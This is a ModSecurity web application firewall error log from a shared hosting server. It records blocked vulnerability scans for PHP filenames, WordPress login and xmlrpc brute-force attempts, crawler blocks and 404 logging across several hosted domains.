[Tue May 26 18:06:31.545161 2026] [security2:error] [pid 960743:tid 960804] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-act.php"] [unique_id "ahWTz_QvEln_BHBy2zKBfwAAozw"]
[Tue May 26 18:06:31.545391 2026] [security2:error] [pid 960743:tid 960903] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-act.php"] [unique_id "ahWTz_QvEln_BHBy2zKBfwAAozw"]
[Tue May 26 18:06:31.733949 2026] [security2:error] [pid 960743:tid 960785] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/myfile.php"] [unique_id "ahWTz_QvEln_BHBy2zKBhwAA8yk"]
[Tue May 26 18:06:31.734174 2026] [security2:error] [pid 960743:tid 960983] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/myfile.php"] [unique_id "ahWTz_QvEln_BHBy2zKBhwAA8yk"]
[Tue May 26 18:06:31.987348 2026] [security2:error] [pid 960743:tid 960787] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xqq.php"] [unique_id "ahWTz_QvEln_BHBy2zKBjAAAlCs"]
[Tue May 26 18:06:31.987576 2026] [security2:error] [pid 960743:tid 960888] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/xqq.php"] [unique_id "ahWTz_QvEln_BHBy2zKBjAAAlCs"]
[Tue May 26 18:06:32.194607 2026] [security2:error] [pid 960743:tid 960779] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/kolda.php"] [unique_id "ahWT0PQvEln_BHBy2zKBkQAA0iM"]
[Tue May 26 18:06:32.194835 2026] [security2:error] [pid 960743:tid 960950] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/kolda.php"] [unique_id "ahWT0PQvEln_BHBy2zKBkQAA0iM"]
[Tue May 26 18:06:32.301213 2026] [security2:error] [pid 960743:tid 960957] [client 185.192.70.3:58953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/chosen.php"] [unique_id "ahWT0PQvEln_BHBy2zKBkgAAANk"]
[Tue May 26 18:06:32.515100 2026] [security2:error] [pid 960743:tid 960809] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/666.php"] [unique_id "ahWT0PQvEln_BHBy2zKBoQAAykE"]
[Tue May 26 18:06:32.515321 2026] [security2:error] [pid 960743:tid 960942] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/666.php"] [unique_id "ahWT0PQvEln_BHBy2zKBoQAAykE"]
[Tue May 26 18:06:33.003561 2026] [security2:error] [pid 960743:tid 960828] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xoot.php"] [unique_id "ahWT0fQvEln_BHBy2zKBrwAAkVQ"]
[Tue May 26 18:06:33.003765 2026] [security2:error] [pid 960743:tid 960885] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/xoot.php"] [unique_id "ahWT0fQvEln_BHBy2zKBrwAAkVQ"]
[Tue May 26 18:06:33.222455 2026] [security2:error] [pid 960743:tid 960883] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT0PQvEln_BHBy2zKBpwAAAI8"]
[Tue May 26 18:06:33.458669 2026] [security2:error] [pid 960743:tid 960800] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/vgtyu.php"] [unique_id "ahWT0fQvEln_BHBy2zKBugAA2Dg"]
[Tue May 26 18:06:33.458824 2026] [security2:error] [pid 960743:tid 960956] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/vgtyu.php"] [unique_id "ahWT0fQvEln_BHBy2zKBugAA2Dg"]
[Tue May 26 18:06:33.653698 2026] [security2:error] [pid 960743:tid 960818] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/06.php"] [unique_id "ahWT0fQvEln_BHBy2zKBwAAA2ko"]
[Tue May 26 18:06:33.654035 2026] [security2:error] [pid 960743:tid 960958] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/06.php"] [unique_id "ahWT0fQvEln_BHBy2zKBwAAA2ko"]
[Tue May 26 18:06:33.875440 2026] [security2:error] [pid 960743:tid 960815] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/erty.php"] [unique_id "ahWT0fQvEln_BHBy2zKBxQAAikc"]
[Tue May 26 18:06:33.875748 2026] [security2:error] [pid 960743:tid 960878] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/erty.php"] [unique_id "ahWT0fQvEln_BHBy2zKBxQAAikc"]
[Tue May 26 18:06:34.064674 2026] [security2:error] [pid 960743:tid 960813] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/fs.php"] [unique_id "ahWT0vQvEln_BHBy2zKByQAA5UU"]
[Tue May 26 18:06:34.064848 2026] [security2:error] [pid 960743:tid 960969] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/fs.php"] [unique_id "ahWT0vQvEln_BHBy2zKByQAA5UU"]
[Tue May 26 18:06:34.113736 2026] [security2:error] [pid 960743:tid 960896] [client 185.192.70.72:27343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-header.php"] [unique_id "ahWT0vQvEln_BHBy2zKBzQAAAJw"]
[Tue May 26 18:06:34.253015 2026] [security2:error] [pid 960743:tid 960844] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/66.php"] [unique_id "ahWT0vQvEln_BHBy2zKB1gAA-2Q"]
[Tue May 26 18:06:34.253192 2026] [security2:error] [pid 960743:tid 960991] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/66.php"] [unique_id "ahWT0vQvEln_BHBy2zKB1gAA-2Q"]
[Tue May 26 18:06:34.623872 2026] [security2:error] [pid 960743:tid 960846] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/grsiuk.php"] [unique_id "ahWT0vQvEln_BHBy2zKB4AAA6GY"]
[Tue May 26 18:06:34.624037 2026] [security2:error] [pid 960743:tid 960972] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/grsiuk.php"] [unique_id "ahWT0vQvEln_BHBy2zKB4AAA6GY"]
[Tue May 26 18:06:34.662006 2026] [security2:error] [pid 960743:tid 960897] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT0vQvEln_BHBy2zKB1QAAAJ0"]
[Tue May 26 18:06:34.835561 2026] [security2:error] [pid 960743:tid 960805] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/new4.php"] [unique_id "ahWT0vQvEln_BHBy2zKB5gAAjT0"]
[Tue May 26 18:06:34.835786 2026] [security2:error] [pid 960743:tid 960881] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/new4.php"] [unique_id "ahWT0vQvEln_BHBy2zKB5gAAjT0"]
[Tue May 26 18:06:35.058432 2026] [security2:error] [pid 960743:tid 960812] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/pouhg.php"] [unique_id "ahWT0_QvEln_BHBy2zKB6wAAiEQ"]
[Tue May 26 18:06:35.058619 2026] [security2:error] [pid 960743:tid 960876] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/pouhg.php"] [unique_id "ahWT0_QvEln_BHBy2zKB6wAAiEQ"]
[Tue May 26 18:06:35.586530 2026] [security2:error] [pid 960743:tid 960851] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xa.php"] [unique_id "ahWT0_QvEln_BHBy2zKB9wAA92s"]
[Tue May 26 18:06:35.586755 2026] [security2:error] [pid 960743:tid 960987] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/xa.php"] [unique_id "ahWT0_QvEln_BHBy2zKB9wAA92s"]
[Tue May 26 18:06:35.801045 2026] [security2:error] [pid 960743:tid 960819] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ms.php"] [unique_id "ahWT0_QvEln_BHBy2zKB_wAA20s"]
[Tue May 26 18:06:35.801298 2026] [security2:error] [pid 960743:tid 960959] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ms.php"] [unique_id "ahWT0_QvEln_BHBy2zKB_wAA20s"]
[Tue May 26 18:06:37.073478 2026] [security2:error] [pid 960743:tid 960984] [client 185.192.70.86:57535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWT1fQvEln_BHBy2zKCKAAAAPQ"]
[Tue May 26 18:06:37.701428 2026] [security2:error] [pid 960743:tid 960886] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT1fQvEln_BHBy2zKCNAAAAJI"]
[Tue May 26 18:06:39.092336 2026] [security2:error] [pid 960743:tid 960974] [client 185.192.70.98:39269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/Marvins.php"] [unique_id "ahWT1_QvEln_BHBy2zKCXgAAAOo"]
[Tue May 26 18:06:40.296052 2026] [security2:error] [pid 960743:tid 960931] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT1_QvEln_BHBy2zKCcwAAAL8"]
[Tue May 26 18:06:40.513507 2026] [security2:error] [pid 960743:tid 960927] [client 114.119.140.137:24207] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/overview"] [unique_id "ahWT2PQvEln_BHBy2zKCjAAAALs"], referer: https://www.gciamd.org.in/overview
[Tue May 26 18:06:40.820242 2026] [security2:error] [pid 960743:tid 960891] [client 47.128.126.200:18516] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWT2PQvEln_BHBy2zKClQAAAJc"]
[Tue May 26 18:06:42.055154 2026] [security2:error] [pid 960743:tid 960966] [client 185.192.70.78:53587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/about.php"] [unique_id "ahWT2vQvEln_BHBy2zKCugAAAOI"]
[Tue May 26 18:06:43.035103 2026] [security2:error] [pid 960743:tid 960934] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT2vQvEln_BHBy2zKCzwAAAMI"]
[Tue May 26 18:06:44.722031 2026] [security2:error] [pid 960743:tid 960747] [remote 167.71.132.111:43358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.132.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT3PQvEln_BHBy2zKC_AAAuAM"]
[Tue May 26 18:06:45.027857 2026] [security2:error] [pid 960743:tid 960916] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT3PQvEln_BHBy2zKC_wAAALA"]
[Tue May 26 18:06:45.103976 2026] [security2:error] [pid 960743:tid 960942] [client 185.192.70.97:53131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-class.php"] [unique_id "ahWT3fQvEln_BHBy2zKDCgAAAMo"]
[Tue May 26 18:06:47.297136 2026] [security2:error] [pid 960743:tid 960940] [client 185.192.70.85:20415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/images/smilies/index.php"] [unique_id "ahWT3_QvEln_BHBy2zKDPgAAAMg"]
[Tue May 26 18:06:48.281357 2026] [security2:error] [pid 960743:tid 960754] [remote 14.161.17.36:47320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT4PQvEln_BHBy2zKDVAAA7Ao"]
[Tue May 26 18:06:48.390688 2026] [security2:error] [pid 960743:tid 960996] [client 85.208.96.204:48634] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/day/2026-05-15/"] [unique_id "ahWT4PQvEln_BHBy2zKDWwAAAQA"]
[Tue May 26 18:06:48.390820 2026] [security2:error] [pid 960743:tid 960996] [client 85.208.96.204:48634] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/day/2026-05-15/"] [unique_id "ahWT4PQvEln_BHBy2zKDWwAAAQA"]
[Tue May 26 18:06:48.482106 2026] [security2:error] [pid 960743:tid 960959] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT4PQvEln_BHBy2zKDUwAAANs"]
[Tue May 26 18:06:49.474542 2026] [security2:error] [pid 960743:tid 960935] [client 185.192.70.76:63033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/xx.php"] [unique_id "ahWT4fQvEln_BHBy2zKDegAAAMM"]
[Tue May 26 18:06:50.750800 2026] [security2:error] [pid 960743:tid 960898] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT4vQvEln_BHBy2zKDlAAAAJ4"]
[Tue May 26 18:06:51.517954 2026] [security2:error] [pid 960743:tid 960965] [client 185.192.70.70:35337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/autoload_classmap.php"] [unique_id "ahWT4_QvEln_BHBy2zKDtwAAAOE"]
[Tue May 26 18:06:53.077779 2026] [security2:error] [pid 960743:tid 960972] [client 81.22.193.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWT5PQvEln_BHBy2zKD1wAAAOg"], referer: https://www.anujtradingco.com/
[Tue May 26 18:06:53.193091 2026] [security2:error] [pid 960743:tid 960949] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT5PQvEln_BHBy2zKD0QAAANE"]
[Tue May 26 18:06:53.539360 2026] [security2:error] [pid 960743:tid 960837] [remote 162.240.52.198:37448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT5fQvEln_BHBy2zKD5gAAxV0"]
[Tue May 26 18:06:54.425843 2026] [security2:error] [pid 960743:tid 960891] [client 81.22.193.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWT5vQvEln_BHBy2zKD-QAAAJc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 18:06:55.985714 2026] [security2:error] [pid 960743:tid 960900] [client 181.44.184.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT5_QvEln_BHBy2zKEGgAAAKA"]
[Tue May 26 18:06:56.096149 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:52892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT5_QvEln_BHBy2zKEJgAAAM8"]
[Tue May 26 18:06:56.096311 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:52892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT5_QvEln_BHBy2zKEJgAAAM8"]
